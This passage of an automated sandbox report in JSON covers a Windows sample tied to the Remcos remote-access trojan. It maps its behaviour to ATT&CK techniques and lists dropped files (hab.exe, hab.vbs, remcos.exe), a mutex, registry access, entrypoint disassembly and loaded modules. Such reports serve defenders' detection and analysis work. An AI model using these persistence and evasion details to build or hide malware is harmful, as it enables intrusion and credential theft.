"https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 14}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 22}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 4, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 4, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 6, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"hab.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.vbs\"\n \"hab.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs\"\n \"remcos.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Remcos-5S9O07\"\n \"\\Sessions\\1\\BaseNamedObjects\\Remcos-5S9O07\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")\n \"WScript.exe\" touched \"VB Script Language\" (Path: \"HKCU\\CLSID\\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\")\n \"WScript.exe\" touched \"Constructor that allows hosts better control creating scriptlets\" (Path: \"HKCU\\CLSID\\{06290BD1-48AA-11D2-8432-006008C3FBFC}\")\n \"WScript.exe\" touched \"Multi Language Support\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{275C23E2-3747-11D0-9FEA-00AA003F8646}\")\n \"WScript.exe\" touched \"FileSystem Object\" (Path: \"HKCU\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}\\TREATAS\")\n \"WScript.exe\" touched \"Windows Script Host Shell Object\" (Path: \"HKCU\\CLSID\\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\\TREATAS\")\n \"WScript.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"hab.exe\" called \"CopyFileW\" to copy %TEMP%\\hab.exe to new location %APPDATA%\\remcos\\remcos.exe (UID: 00000000-00006072)\n \"hab.exe\" called \"CopyFileW\" to copy %TEMP%\\hab.exe to new location %APPDATA%\\remcos\\remcos.exe (UID: 00000000-00003528)\n \"hab.exe\" called \"CopyFileW\" to copy %TEMP%\\hab.exe to new location %APPDATA%\\remcos\\remcos.exe (UID: 00000000-00003748)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" searching for class \"Shell_TrayWnd\"\n \"hab.exe\" searching for class \"Shell_TrayWnd\"\n \"remcos.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hab.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"remcos.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" file has an entrypoint instructions - \"push\t0x402c10,call\t0x40126c,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,pop\tesp,cmp\tah, ah,jle\t0x4012ed,cmp\tesi, 0x8dad9842,and\tesi, dword ptr [edi + 0xe3d952],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], cl,push\tes,inc\teax,add\tdword ptr [ecx], 0x6e,outsd\tdx, dword ptr [esi],outsb\tdx, byte ptr [esi],add\tbyte ptr [eax - 0x42], dl,mov\tal, byte ptr [eax],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,push\tss,aad\t0xe,mov\tcl, 0x10,jbe\t0x4012c9,mov\tbyte ptr [0x52f8a347], al,xor\teax, 0x902d21f5,cld\t,pop\tesi,pop\tesi,\"\n \"hab.exe\" file has an entrypoint instructions - \"push\t0x402c10,call\t0x40126c,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,pop\tesp,cmp\tah, ah,jle\t0x4012ed,cmp\tesi, 0x8dad9842,and\tesi, dword ptr [edi + 0xe3d952],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], cl,push\tes,inc\teax,add\tdword ptr [ecx], 0x6e,outsd\tdx, dword ptr [esi],outsb\tdx, byte ptr [esi],add\tbyte ptr [eax - 0x42], dl,mov\tal, byte ptr [eax],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,push\tss,aad\t0xe,mov\tcl, 0x10,jbe\t0x4012c9,mov\tbyte ptr [0x52f8a347], al,xor\teax, 0x902d21f5,cld\t,pop\tesi,pop\tesi,\"\n \"remcos.exe\" file has an entrypoint instructions - \"push\t0x402c10,call\t0x40126c,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,pop\tesp,cmp\tah, ah,jle\t0x4012ed,cmp\tesi, 0x8dad9842,and\tesi, dword ptr [edi + 0xe3d952],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], cl,push\tes,inc\teax,add\tdword ptr [ecx], 0x6e,outsd\tdx, dword ptr [esi],outsb\tdx, byte ptr [esi],add\tbyte ptr [eax - 0x42], dl,mov\tal, byte ptr [eax],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,push\tss,aad\t0xe,mov\tcl, 0x10,jbe\t0x4012c9,mov\tbyte ptr [0x52f8a347], al,xor\teax, 0x902d21f5,cld\t,pop\tesi,pop\tesi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71250000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"KERNEL32\" at base 75df0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a6b0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"SXS.DLL\" at base 75550000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"CRYPTSP.DLL\" at base 75050000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74de0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"ADVAPI32.DLL\" at base 775f0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"CRYPTBASE.DLL\" at base 75540000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"DWMAPI.DLL\" at base 73ea0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"COMCTL32\" at base 74540000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"UXTHEME.DLL\" at base 744b0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 761c0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"CLBCATQ.DLL\" at base 75ed0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 763f0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"SHELL32\" at base 764c0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"NTDLL\" at base 77740000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"IPHLPAPI\" at base 737b0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"ADVAPI32\" at base 775f0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"DHCPCSVC.DLL\" at base 735a0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"IPHLPAPI.DLL\" at base 737b0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"RPCRT4.DLL\" at base 75980000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 754f0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"OLE32.DLL\" at base 761c0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"PROPSYS.DLL\" at base 74190000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"COMCTL32.DLL\" at base 74540000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"OLEAUT32.DLL\" at base 778a0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74190000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"NTMARTA.DLL\" at base 74ab0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77960000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"PROFAPI.DLL\" at base 75660000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"APPHELP.DLL\" at base 754f0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6edd0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 764c0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75df0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75920000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75f60000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"SECUR32.DLL\" at base 75380000\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75930000\n 